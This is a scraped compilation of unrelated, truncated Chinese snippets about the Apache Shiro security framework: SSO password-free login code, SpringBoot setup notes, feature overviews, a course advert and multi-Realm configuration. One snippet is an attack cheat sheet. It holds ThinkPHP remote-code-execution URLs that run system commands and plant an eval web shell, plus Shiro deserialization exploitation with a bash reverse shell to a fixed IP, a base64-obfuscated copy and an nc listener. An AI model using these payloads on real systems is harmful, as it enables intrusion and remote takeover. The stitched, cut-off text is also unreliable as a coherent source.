shiro

最近做接入SSO单点登录，需要从别的系统返回的用户然后直接登录，所以需要用到免密登录，其实很简单，自己写一个类继承HashedCredentialsMatcher类，然后重写doCredentialsMatch，判断免密登录规则可结合实际业务需求更改，符合规则的return true就代表密码校验通过，代码如下： import org.apache.shiro.authc.AuthenticationInfo; import org.apache.shiro.authc.AuthenticationToken; import org.apache.shiro.authc.credential.HashedCredentialsMatcher; public class CybHashedCredentialsMatcher extends HashedCredentialsMatcher { @Override public boolean doCredentialsMatch(AuthenticationToken authcToken, AuthenticationInfo info) { UsernamePasswordToken token = (UsernamePasswordToken) authcToken; if(StringUtils.isNotBlank

最近我在搭建一个SpringBoot的后台管理系统，写到一半想起来博客好像很久很久没更新了，所以准备把这个项目的开发过程记录到博客系统里，这个系统现在已经集成了Mysql、Mybatis-Plus、Redis、Shiro、Druid、lombok。这个系统我开发了两个星期了，主要时间花在Shiro上了，现在Shrio使用Redis作为Catch和Session存储器，未来准备集成Kafka作为日志记录系统，把日志数据写到数据库里。 第一步我们要创建一个SpringBoot项目，我个人习惯使用IDEA，所以使用IDEA创建SpringBoot项目。 打开IDEA，点击File->New->Project。然后选择SpringInitializr，点next，配置项目信息。我自己本地装的还是JDK8，所以JavaVersion就选8。配置信息配置好之后，就要选择引用的包，我们到时候自己在pom文件里添加就行，继续next，配置项目名称。最后配置一下项目名称和创建地址，我们就搭建成了。 这个是项目的地址 https://github.com/Raindtop/Spring-Backstage，这个后台搭建的所有代码都在这里面。 来源： oschina 链接： https://my.oschina.net/u/4109273/blog/4952473

一、概述 1、Shiro是什么？ 　　Apache Shiro是java 的一个安全框架，主要提供：认证、授权、加密、会话管理、与Web集成、缓存等功能，其不依赖于Spring即可使用； 　　Spring Security（Oauth2）也是一个开源的权限框架，但其依赖于Spring运行，功能相对强大；而Shiro相对独立，不依赖于Spring，使用简单、灵活，所以我选择Shiro学习。哈哈~ 2、Shiro基本功能 ①Authentication（音标： [ɔːˌθentɪˈkeɪʃn] ） 　　身份认证，验证用户是不是拥有相应的身份。 ②Authorization（音标：[ˌɔːθərəˈzeɪʃn]） 　　授权即权限验证，验证某个已认证的用户是否拥有某个权限（比如接下来我要实现的：不用用户拥有不用的菜单树） ③Session Management 　　会话管理，在用户登录后，退出之前，所有信息都存在于会话中（这里可以用于sso单点登录） ④Crptography 　　加密，保护数据的安全性（比如密码加密存储到数据库，而不是明文存储） ⑤Web支持 　　非常容易集成到Web环境 ⑥Caching 　　缓存，比如用户登录后，其用户信息、拥有的角色/权限不必每次去查，这样可以提高效率 ⑦Concurrency 　　Shiro支持多线程应用宝并发验证，（即在一个线程中开启另一个线程

Java开发企业级权限管理系统 download： 百度云盘 全程手把手带你运用Java技术栈，打造一套基于最流行的RBAC拓展模型的，分布式的，有界面的，高灵活性，高拓展性的企业级权限管理系统。学完本课程你将可以轻松应对绝大多数企业开发中与权限管理及后台系统相关的需求。 技术储备要求 后端技术要求：有SSM、Maven、Redis基础 前端技术要求：有jQuery、Bootstrap、Mustache、zTree、Duallistbox基础 课程目錄 ： 第1章 课程整體概述（購置套餐更劃算） 本章首先引見爲什麼大公司都有權限管理係統，然後會對權限管理中盛行的RBAC模型及拓展做重點阐明，並給出理想中的權限管理係統應該是什麼樣子的。之後會對這門课程做總體内容引見與课程佈置，最後會引見這門课程會觸及到的技術，讓大家明白理解到這門课程到底能收獲些什麼（课程提供QQ交流群）。... 1-1 课前必讀（不看會錯過一個億） 1-2 课程導學試看 1-3 爲什麼企業級項目需求權限管理試看 1-4 權限管理的中心是什麼？ 1-5 理想中的權限管理應該是什麼樣的？試看 1-6 主流開源權限管理框架有哪些？ 1-7 课程佈置與學問點引見 第2章 Spring Security權限框架理論與實戰演練 本章首先讓大家學習到Spring Security權限框架的架構，之後大家能夠學習到Spring

一 Thinkphp-5.1.30 /index.php?s=index/think\app/invokefunction&function=call _user_ func_array&vars[ 0 ]=system&vars[ 1 ][ ]=whoami /index.php/? s = index /\think\template\driver\file/ write &cacheFile=kanhayou.php&content=%3C?php%C2%A0@eval($_POST[kanhayou]);?%3E 二 Shiro-反序列化 出网验证： https: //github.com/sv3nbeast/ShiroScan python3 shiro_rce.py http: //xx.xx.70.24:40817 "ping cqehyd.dnslog.cn" 准备工作： bash -i >& /dev/tcp/123.123.151.3/8003 0>&1 bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTUxLjMvODA123123}|{base64,-d}|{bash,-i} nc -lvvp 8003 利用： https: //github.com/insightglacier/Shiro

高质量的安全文章，安全offer面试经验分享 尽在 # 掌控安全EDU # 作者：掌控安全学员-xiaoc 修复百度云链接，新增shiro反序列化检测工具（在网盘链接里） 还有众多工具：公众号后台回复“zkaq”获取下载 0.1 话说 之前发表过此文章，但是觉得很多不足，想改改， 奈何最近项目事情太多，一直拖到现在。稍微修改一下，总是觉得差点什么。 等等慢慢改吧，大家多提意见。 0.2 正文 每年一度的HVV已经接近尾声，有幸参加过几次蓝队也做过几次红队，想着写点什么。 看到群里一些兄弟在要一些工具 ，就分享 一些经常使用工具吧。 pass: 不知道为何，越来越觉得自己像一个工具小子了。 希望大家在使用一些工具之余，去探究一些工具的原理，以及如何用代码去实现。 另外本文推荐的工具，在平常的渗透测试过程之中也有很大的用处。 所有的工具打包上传 ， 后台回复“工具”获取 。大家先耐心查看即可 1.信息收集篇 1.1 端口收集之railgun 先看看他的样子， 其实railgun是一个相对综合点的工具，或者说扫描器。 一般我是用它来做端口扫描，这款工具也是在做端口扫描的时候接触到的，发现挺不错。 到这里肯定有人会问：为什么不用nmap呢？ 其实主要的原因是因为nmap太慢， 而且不到最后nmap不出结果也不能查看 令人意外的是，这款工具扫描的结果比nmap还全。 这里多说一句

shiro使用注解（@RequiresPermissions等）不无效及异常处理 参考文章： （1）shiro使用注解（@RequiresPermissions等）不无效及异常处理 （2）https://www.cnblogs.com/kingsonfu/p/10388114.html 备忘一下。 来源： oschina 链接： https://my.oschina.net/u/4437884/blog/4932963

使用多个Realm的处理机制： 1、Authenticator 默认实现是ModularRealmAuthenticator,它既支持单一Realm也支持多个Realm。如果仅配置了一个Realm，ModularRealmAuthenticator 会直接调用该Realm处理认证信息，如果配置了多个Realm，它会根据认证策略来适配Realm，找到合适的Realm执行认证信息。 自定义Authenticator的配置： Java代码 [main] ... authenticator = com.foo.bar.CustomAuthenticator securityManager.authenticator = $authenticator 2、AuthenticationStrategy（认证策略） 当应用程序配置了多个Realm时，ModularRealmAuthenticator将根据认证策略来判断认证成功或是失败。 例如，如果只有一个Realm验证成功，而其他Realm验证失败，那么这次认证是否成功呢？如果大多数的Realm验证成功了，认证是否就认为成功呢？或者，一个Realm验证成功后，是否还需要判断其他Realm的结果？认证策略就是根据应用程序的需要对这些问题作出决断。 认证策略是一个无状态的组件，在认证过程中会经过4次的调用： 在所有Realm被调用之前